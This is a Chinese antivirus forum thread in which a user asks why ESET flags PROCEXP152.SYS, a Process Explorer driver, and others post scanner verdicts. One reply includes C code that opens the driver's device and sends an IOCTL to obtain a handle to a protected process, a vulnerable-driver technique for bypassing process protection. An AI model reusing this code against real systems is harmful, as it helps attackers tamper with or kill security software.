查看: 2047|回复: 12
收起左侧

[可疑文件] PROCEXP152.SYS

[复制链接]
xzykgc4mc3
发表于 2023-3-28 14:05:43 | 显示全部楼层 |阅读模式
  1. https://we.tl/t-VJt4mo8JMQ
  2. https://ttm.sh/WbZ.zip
  3. https://megaupload.nz/L37707hbz6/PROCEXP152_zip
复制代码
任选一个链接
密码123
应该是ProcessExplorer16.43释放出的来的驱动。
但今天eset突然提示潜在不安全。是因为版本太低了,驱动容易被利用吗。

https://www.virustotal.com/gui/f ... 1ecfc863bc3490e4f5c
这里的eset倒是没有报
查信誉,也是良好。

请大佬们看看。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
kuroandsan
发表于 2023-3-28 14:10:16 | 显示全部楼层
KSN 受信任


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
xzykgc4mc3 + 1 感谢解答: )

查看全部评分

Eset小粉絲
发表于 2023-3-28 14:30:23 | 显示全部楼层
最新版报么?
hhhq316
头像被屏蔽
发表于 2023-3-28 14:32:48 | 显示全部楼层
Norton文件分析受信任

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
xzykgc4mc3 + 1 感谢解答: )

查看全部评分

wowocock
发表于 2023-3-28 15:09:16 | 显示全部楼层
wowocock
发表于 2023-3-28 15:17:01 | 显示全部楼层
#include "ppl_bypass_driver.h"

typedef struct procexp_close_handle {
        ULONGLONG pPid = 0x0;
        PVOID ObjectType;
        ULONGLONG nothing2 = 0x0;
        ULONGLONG handle;
} Procexp_close, * pProcexp_close;


/*Creates the handle to the driver object*/
HANDLE hProcExpDevice;


EXTERN_C HANDLE open_driver()
{
        hProcExpDevice = CreateFileA("\\\\.\\PROCEXP152", GENERIC_ALL, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hProcExpDevice == INVALID_HANDLE_VALUE)
        {
                printf("Unable to open driver handle, Error code:%d\n", GetLastError());
                return 0;
        }
        else {
                printf("HANDLE %p\n", hProcExpDevice);
        }
        return hProcExpDevice;
}

/*Opens handle to a protected process*/
EXTERN_C HANDLE open_handle(ULONGLONG processPid, HANDLE hProcExpDevice)
{
        HANDLE hProtectedProcess = NULL;
        DWORD dwBytesReturned = 0;
        BOOL ret = FALSE;
        char* endptr = 0;

        ret = DeviceIoControl(hProcExpDevice, IOCTL_OPEN_PROTECTED_PROCESS_HANDLE, (LPVOID)&processPid, sizeof(processPid),
                &hProtectedProcess,
                sizeof(HANDLE),
                &dwBytesReturned,
                NULL);


        if (dwBytesReturned == 0 || !ret)
        {
                printf("Protected process opening error: %d\n", GetLastError());
                return 0;
        }

        return hProtectedProcess;
}

评分

参与人数 1人气 +1 收起 理由
xzykgc4mc3 + 1 感谢解答: )

查看全部评分

莒县小哥
发表于 2023-3-28 15:40:07 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
xzykgc4mc3 + 1 感谢解答: )

查看全部评分

仰望星空--风影
发表于 2023-3-28 15:41:15 | 显示全部楼层
火绒右键正常
tdsskiller
发表于 2023-3-28 15:54:47 | 显示全部楼层
微软的processexp系列全是漏洞,被拉黑了很正常

评分

参与人数 1人气 +1 收起 理由
xzykgc4mc3 + 1 感谢解答: )

查看全部评分

xzykgc4mc3
 楼主| 发表于 2023-3-28 19:18:05 | 显示全部楼层

最新版ProcessExplorer17.02释放出的驱动PROCEXP152.SYS,eset倒是没报潜在不安全。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-2 10:21 , Processed in 0.129287 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表